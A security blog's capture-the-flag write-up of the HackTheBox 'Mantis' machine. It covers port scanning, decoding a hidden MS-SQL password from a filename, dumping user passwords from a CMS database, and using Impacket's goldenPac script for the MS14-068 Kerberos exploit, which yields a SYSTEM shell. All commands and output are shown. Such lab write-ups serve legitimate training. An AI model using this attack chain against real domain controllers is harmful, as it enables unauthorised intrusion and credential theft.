Booj thoughts on security

HackTheBox - Mantis

This writeup details attaching the Mantis machine from HackTheBox.

In short this machine looked indomitable at the start with it’s ridiculous list of open ports. Targeted enumeration, however, reveals that it’s not as bad as first expected.

Chapters:

Topics:

Enumeration

PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2017-09-17 13:46:12Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1337/tcp  open  http         Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2017-09-17T01:35:45
|_Not valid after:  2047-09-17T01:35:45
|_ssl-date: 2017-09-17T13:47:20+00:00; +7s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc        Microsoft Windows RPC
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  unknown
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
50255/tcp open  unknown
54393/tcp open  msrpc        Microsoft Windows RPC
54398/tcp open  msrpc        Microsoft Windows RPC

That is a long list of ports! We need to see what we can identify about this from the port scan and attack the high value ports first.

From port 88, the kerberos port we can deduce that this machine is a member of a Windows Active Directory Environment. Port 389, the LDAP service port, confirms this suspicion. From this information we can make the reasonable assumption that we are attacking a Windows Domain Controller.

The machine is also running web-services on port 1337 and port 8080. 1337 merely shows the default IIS index page, whilst 8080 has a blog powered by Orchard CMS:

The name is not lost on me.

Running a dirbuster on both services reveals that a/secure_notes/ directory exists on port 1337. Inside we see two files:

web.config isn’t actually readable but let’s have a look inside dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt:

1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

So we know there’s a database user called admin used to create the orcharddb database, but we’re still in need of a password. Looking at the filename, the last part of the filename looks like it’s a base64 encoded string. We can decode this quite easily:

>>> import base64
>>> base64.b64decode('NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx')
'6d2424716c5f53405f504073735730726421'

The result of the decoding is a hex string. It could be a hash, but to ensure it’s not just hex-encoded, we run a quick decode:

>>> '6d2424716c5f53405f504073735730726421'.decode('hex')
'm$$ql_S@_P@ssW0rd!'

Well that looks like our MS-SQL password!

MS-SQL Credentials

For MS-SQL, metasploit has a number of inbuilt modules, but I’ve found them to be fairly buggy in the past, so working with sqsh allows us to manually enumerate with the database.

The password implies it’s for the sa user, but connecting with that yields no result. Connecting with username admin however, does. We use the following:

sqsh -U admin -S 10.10.10.52

As a quick aside, it’s worthwhile to check whenever working with an MS-SQL database is the presence of higher privileges. We can check these manually, but a quick check is to see if you can access advanced options. As we see below, we don’t have the necessary permissions:

1> exec sp_configure 'show advanced options', 1
2> go
Msg 15247, Level 16, State 1
Server 'MANTIS\SQLEXPRESS', Procedure 'sp_configure', Line 105
User does not have permission to perform this action.
(return status = 1)

Enumerating the database, we check the OrchardDB for the presence of any left over user records:

1> SELECT Username, Password FROM blog_Orchard_Users_UserPartRecord;
2> go

This yields the following user accounts:

admin:Password1234 
James:J@m3s_P@ssW0rd! 

We test both credentials on a number of services, but it turns out he’s not even a user within the installed OrchardCMS on port 8080. Trying it on a number of services, it turns out he’s a user on the Windows Machine itself.

root@kali:~# nmap -sU -sS --script smb-os-discovery.nse -p U:139,T:139 10.10.10.52

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-23 15:59 EST
Nmap scan report for MANTIS.HTB.LOCAL (10.10.10.52)
Host is up (0.071s latency).

PORT    STATE  SERVICE
139/tcp open   netbios-ssn
139/udp closed netbios-ssn

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2018-02-23T15:59:13-05:00

Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds
root@kali:/tmp/impacket/examples# smbclient -U James -W HTB  \\\\MANTIS\\NETLOGON
WARNING: The "syslog" option is deprecated
Enter HTB\James's password: 
Try "help" to get a list of possible commands.
smb: \> 

MS14-068

In short, the vulnerability targeted the kerberos service, and allowed any user to elevate their permissions from regular user, to domain admin by forging a kerberos ticket. This is quite a well known exploit and it’s always worth checking if interacting with an out of date domain controller if you have a lower privileged user.

The Impacket goldenPac script is about as point-and-click as this attack gets in all honesty. It handles the more annoying parts such as fetching the SID, and authorizing with the kerberos ticket. We run it as below and are almost instantly returned a shell:

root@kali:/tmp/impacket/examples# python goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 HTB.LOCAL/james@mantis.htb.local
Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies

Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[-] Couldn't get forest info ([Errno Connection error (htb.local:445)] [Errno -2] Name or service not known), continuing
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file rFgUlpSB.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service RKhU on 10.10.10.52.....
[*] Starting service RKhU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

References

https://labs.mwrinfosecurity.com/blog/digging-into-ms14-068-exploitation-and-defence/
https://www.trustedsec.com/2014/12/ms14-068-full-compromise-step-step/
https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/
http://blog.liatsisfotis.com/knock-and-pass-kerberos-exploitation.html

comments powered by Disqus